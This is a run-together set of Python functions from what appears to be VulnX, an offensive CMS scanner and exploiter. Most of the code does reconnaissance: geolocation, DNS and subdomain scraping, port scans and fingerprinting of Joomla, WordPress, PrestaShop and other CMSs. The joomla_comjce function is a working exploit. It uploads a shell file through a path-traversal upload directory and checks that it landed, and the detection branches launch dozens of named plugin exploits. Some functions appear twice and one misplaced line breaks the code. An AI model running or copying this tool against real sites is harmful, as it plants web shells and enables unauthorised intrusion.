def web_host(self): urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd( self.url) getinfo = requests.get(urldate, self.headers).text regex_date = r'Date: (.+?)-(.+?)' regex_date = re.compile(regex_date) matches = re.search(regex_date, getinfo) try: if matches: print(' {0} Domain Created on : {1}'.format( good, matches.group(1))) ip = socket.gethostbyname(hostd(self.url)) print(' {0} CloudFlare IP : {1}'.format(good, ip)) ipinfo = "http://ipinfo.io/" + ip + "/json" gather = requests.get(ipinfo, self.headers).text self.match_printer( 'Country', self.match_info(r'country\": \"(.+?)\"', gather)) self.match_printer( 'Region', self.match_info(r'region\": \"(.+?)\"', gather)) self.match_printer( 'Timezone', self.match_info(r'timezone\": \"(.+?)\"', gather)) self.match_printer( 'Postal', self.match_info(r'postal\": \"(.+?)\"', gather)) self.match_printer( 'Org', self.match_info(r'org\": \"(.+?)\"', gather)) self.match_printer( 'Location', self.match_info(r'loc\": \"(.+?)\"', gather)) except Exception as err: print(' {0} Parse Error : {1}'.format(bad, err))
def domain_info(url): domain = hostd(url) dnsdumpster_url = 'https://dnsdumpster.com/' response = requests.Session().get(dnsdumpster_url).text csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1) cookies = {'csrftoken': csrf_token} headers = {'Referer': 'https://dnsdumpster.com/'} data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain} response = requests.Session().post('https://dnsdumpster.com/', cookies=cookies, data=data, headers=headers) image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) if response.status_code == 200: soup = BeautifulSoup(response.content, 'html.parser') tables = soup.findAll('table') res = {} res['domain'] = domain res['dns_records'] = {} res['dns_records']['host'] = results(tables[3]) print(' %s SubDomains' % que) for entry in res['dns_records']['host']: print(( " %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s" .format(**entry) % (good, good, bannerblue, end)))
def dnsdumper(url): domain = hostd(url) dnsdumpster_url = 'https://dnsdumpster.com/' response = requests.Session().get(dnsdumpster_url).text # If no match is found, the return object won't have group method, so check. try: csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1) except AttributeError: # No match is found csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response) print (' %s Retrieved token: %s' % (info,csrf_token)) cookies = {'csrftoken': csrf_token} headers = {'Referer': 'https://dnsdumpster.com/'} data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain } response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers) image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) if response.status_code == 200: soup = BeautifulSoup(response.content, 'html.parser') tables = soup.findAll('table') res = {} res['domain'] = domain res['dns_records'] = {} res['dns_records']['dns'] = results(tables[0]) res['dns_records']['mx'] = results(tables[1]) print(' %s Search for DNS Servers' % que) for entry in res['dns_records']['dns']: print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end))) print(' %s Search for MX Records ' % que) for entry in res['dns_records']['mx']: print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
def portscan(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.port: result = sock.connect_ex((hostd(self.url), self.port)) if result == 0: print(' {} {} {} {}'.format( que, self.port, portopen, portsobject[self.port])) else: print(' {} {} {} {}'.format( que, self.port, portclose, portsobject[self.port]))
def dnsdumper(url): ''' For DNS Dump you retrieve token from dnsdumpster. V T X | / | / | / | / U -> N | / Parsing data from records | / MX , Domains , DNS , MAILS L Schema V, returns set of (U, L, N, T, X) ''' domain = hostd(url) dnsdumpster_url = 'https://dnsdumpster.com/' response = requests.Session().get(dnsdumpster_url, verify=False) soup = BeautifulSoup(response.text, 'html.parser') # If no match is found, the return object won't have group method, so check. try: csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value'] except AttributeError: # No match is found csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value'] print(' %s Retrieved token: %s' % (info, csrf_token)) cookies = {'csrftoken': csrf_token} headers = {'Referer': 'https://dnsdumpster.com/'} data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain} response = requests.Session().post('https://dnsdumpster.com/', cookies=cookies, data=data, headers=headers, verify=False) image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain, verify=False) if response.status_code == 200: soup = BeautifulSoup(response.content, 'html.parser') tables = soup.findAll('table') res = {} res['domain'] = domain res['dns_records'] = {} res['dns_records']['dns'] = results(tables[0]) res['dns_records']['mx'] = results(tables[1]) print(' %s Search for DNS Servers' % que) for entry in res['dns_records']['dns']: print(( " %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s" .format(**entry) % (good, good, good, bannerblue, end))) print(' %s Search for MX Records ' % que) for entry in res['dns_records']['mx']: print(( " %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s" .format(**entry) % (good, good, good, bannerblue, end)))
def webhosting_info(hostinfo): print (' %s Web Hosting Information' % (run)) urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url) getinfo = requests.get(urldate,headers).text regex_date = r'Date: (.+?)-(.+?)' regex_date = re.compile(regex_date) matches = re.search(regex_date,getinfo) if matches: print ( ' %s Domain Created on : %s' % (good,matches.group(1))) try: ip = socket.gethostbyname(hostd(url)) print ( ' %s CloudFlare IP : %s' % (good,ip)) ipinfo = "http://ipinfo.io/" + ip + "/json" getipinfo = requests.get(ipinfo,headers).text country = re.search(re.compile(r'country\": \"(.+?)\"'),getipinfo) region = re.search(re.compile(r'region\": \"(.+?)\"'),getipinfo) latitude = re.search(re.compile(r'latitude: (.+?)'),getipinfo) longitude = re.search(re.compile(r'longitude\": \"(.+?)\"'),getipinfo) timezone = re.search(re.compile(r'timezone\": \"(.+?)\"'),getipinfo) ans = re.search(re.compile(r'ans\": \"(.+?)\"'),getipinfo) org = re.search(re.compile(r'org\": \"(.+?)\"'),getipinfo) if country: print(' %s Country : %s' % (good,country.group(1))) if region: print(' %s Region : %s' % (good,region.group(1))) if latitude: print(' %s Latitude : %s' % (good,latitude.group(1))) if longitude: print(' %s Longitude : %s' % (good,longitude.group(1))) if timezone: print(' %s Timezone : %s' % (good,timezone.group(1))) if ans: print(' %s Ans : %s' % (good,ans.group(1))) if org: print(' %s Org : %s' % (good,org.group(1))) print ("-----------------------------------------------") except Exception as converterror: print(' %s Error to get ip for this web ' % (bad))
def joomla_comjce(url, headers, timeout): host = hostd(url) headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" data = { 'upload-dir': './../../', 'upload-overwrite': 0, 'Filedata': [open('./shell/VulnX.gif', 'rb')], 'action': 'Upload', } content = vxpost(endpoint, data, headers, timeout) path_shell = url + "/VulnX.gif" res = requests.get(path_shell, headers).text matches = re.findall(re.compile(r'/image/gif/'), res) if matches: print(' %s Com Jce %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Jce %s' % (que, failexploit))
def detect_cms(): lm = url + '/smiley/1.gif' lm_content = requests.get(lm,headers).text lm2 = url + '/rss.xml' lm2_content = requests.get(lm2,headers).text content=requests.get(url,headers).text # try: ############################ # # # joomla # # # ############################ #joomla searching content to detect. if re.search(re.compile(r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s %sCMS :%s Joomla' % (good,W,end)) print ('------------------------------------------------') #webinfo gathering argument if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) joo_version(url,headers) print ("-----------------------------------------------") if cms == 'all': print (' %s CMS informations gathering' %(run)) joo_version(url,headers) joo_user(url,headers) joo_template(url,headers) print ("-----------------------------------------------") #port to scan if scanports: print (' %s Scanning Ports' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump' %(run)) dnsdumper(url) print ("-----------------------------------------------") #joomla_exploits imported from folder[./common/joomla_exploits.py] if exploit: print (' %s Check Vulnerability' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) joomla_comjce(url,headers,timeout) joomla_comedia(url,headers,timeout) joomla_comjdownloads(url,headers,timeout) joomla_comjdownloads2(url,headers,timeout) joomla_fabrik2(url,headers,timeout) joomla_fabrik2_d(url,headers,timeout) joomla_foxcontact(url,headers,timeout) ############################ # # # Wordpress # # # ############################ #wordpress searching content to detect. elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s %sCMS :%s Wordpress' % (good,W,end)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) #wp_grab methods info from (folder)[./common/grapwp.py] if cms == 'version': print (' %s CMS informations gathering' %(run)) wp_version(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'themes': print (' %s CMS informations gathering' %(run)) wp_themes(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'user': print (' %s CMS informations gathering' %(run)) wp_user(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'plugins': print (' %s CMS informations gathering' %(run)) wp_plugin(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'all': print (' %s CMS informations gathering' %(run)) wp_version(url,headers,grabinfo) wp_themes(url,headers,grabinfo) wp_user(url,headers,grabinfo) wp_plugin(url,headers,grabinfo) print ("-----------------------------------------------") #port to scan if scanports: print (' %s Scanning Ports' %(run)) print (""" %sPORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump' %(run)) dnsdumper(url) print ("-----------------------------------------------") # vulnx -u http://example.com -e | vulnx -u http://example --exploit if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) #wp_exploit methods from (dolder)[./common/wp_exploits.py] wp_wysija(url,headers,vulnresults) wp_blaze(url,headers,vulnresults) wp_synoptic(url,headers,vulnresults) wp_catpro(url,headers,vulnresults) wp_cherry(url,headers,vulnresults) wp_dm(url,headers,vulnresults) wp_fromcraft(url,headers,vulnresults) wp_jobmanager(url,headers,vulnresults) wp_showbiz(url,headers,vulnresults) wp_shop(url,headers,vulnresults) wp_powerzoomer(url,headers,vulnresults) wp_revslider(url,headers,vulnresults) wp_adsmanager(url,headers,vulnresults) wp_inboundiomarketing(url,headers,vulnresults) wp_adblockblocker(url,headers,vulnresults) wp_levoslideshow(url,headers,vulnresults) print ("-----------------------------------------------") ############################ # # # Drupal # # # ############################ #drupal searching content to detect. elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Drupal' % (good)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) drupal_version() if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) ############################ # # # Prestashop # # # ############################ #prestashop searching content to detect. elif re.search(re.compile(r'Prestashop|prestashop'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s %sCMS :%s Prestashop' % (good,W,end)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) prestashop_version() if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) columnadverts(url,headers) soopabanners(url,headers) vtslide(url,headers) simpleslideshow(url,headers) productpageadverts(url,headers) productpageadvertsb(url,headers) jro_homepageadvertise(url,headers) attributewizardpro(url,headers) oneattributewizardpro(url,headers) attributewizardpro_old(url,headers) attributewizardpro_x(url,headers) advancedslider(url,headers) cartabandonmentpro(url,headers) cartabandonmentpro_old(url,headers) videostab(url,headers) wg24themeadministration(url,headers) fieldvmegamenu(url,headers) wdoptionpanel(url,headers) pk_flexmenu(url,headers) nvn_export_orders(url,headers) tdpsthemeoptionpanel(url,headers) masseditproduct(url,headers) ############################ # # # OpenCart # # # ############################ #opencart searching content to detect. elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : OpenCart' % (good)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) ############################ # # # Magento # # # ############################ #magento searching content to detect. elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Magento' % (good)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) ############################ # # # Lokomedia # # # ############################ #lokomedia searching content to detect. print (' %s Check Vulnerability' %(run)) elif re.search(re.compile(r'image/gif'), lm_content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Lokomedia' % (good)) print ('------------------------------------------------') if subdomains: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) print ('------------------------------------------------') if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") print (' %s Check Vulnerability' %(run)) elif re.search(re.compile(r'lokomedia'), lm2_content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Lokomedia' % (good)) print ('------------------------------------------------') if subdomains: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") print (' %s Check Vulnerability' %(run)) ############################ # # # Unknown # # # ############################ #no cms detect else: print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Unknown' % (bad)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------")